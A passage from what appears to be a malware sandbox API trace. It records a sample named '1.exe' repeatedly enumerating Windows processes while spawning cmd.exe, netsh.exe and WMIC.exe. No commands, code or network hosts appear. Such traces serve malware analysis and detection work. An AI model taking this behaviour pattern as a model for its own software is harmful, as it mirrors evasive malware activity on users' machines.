cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.957] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.958] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.958] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.959] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.960] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.960] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.961] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.961] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.962] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0139.963] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.963] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0139.964] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0139.964] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0139.965] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0139.965] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0139.966] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0139.967] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0139.967] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0139.968] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0139.968] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0139.969] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0139.970] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0139.970] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0139.971] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0139.971] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0139.972] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0139.973] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0139.973] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0139.974] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0139.975] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0139.975] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0139.976] Process32NextW (in: hSnapshot=0x288, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0139.976] CloseHandle (hObject=0x288) returned 1 [0139.977] Sleep (dwMilliseconds=0x1f4) [0140.798] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e4 [0140.806] Process32FirstW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0140.807] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0140.808] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0140.808] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.809] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0140.810] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0140.810] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0140.811] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0140.811] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0140.812] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0140.813] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0140.813] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.814] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.815] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0140.815] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x40, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.816] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.816] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.817] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.818] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.818] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.819] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.820] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.820] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.821] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.821] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0140.822] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.823] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0140.823] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0140.824] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0140.824] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0140.825] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0140.826] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0140.826] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0140.827] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0140.828] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0140.828] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0140.829] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0141.064] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0141.065] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0141.066] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0141.066] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0141.067] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0141.067] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0141.068] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0141.069] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0141.069] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 1 [0141.070] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIC.exe")) returned 0 [0141.071] CloseHandle (hObject=0x2e4) returned 1 [0141.071] Sleep (dwMilliseconds=0x1f4) [0142.079] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2f8 [0142.083] Process32FirstW (in: hSnapshot=0x2f8, 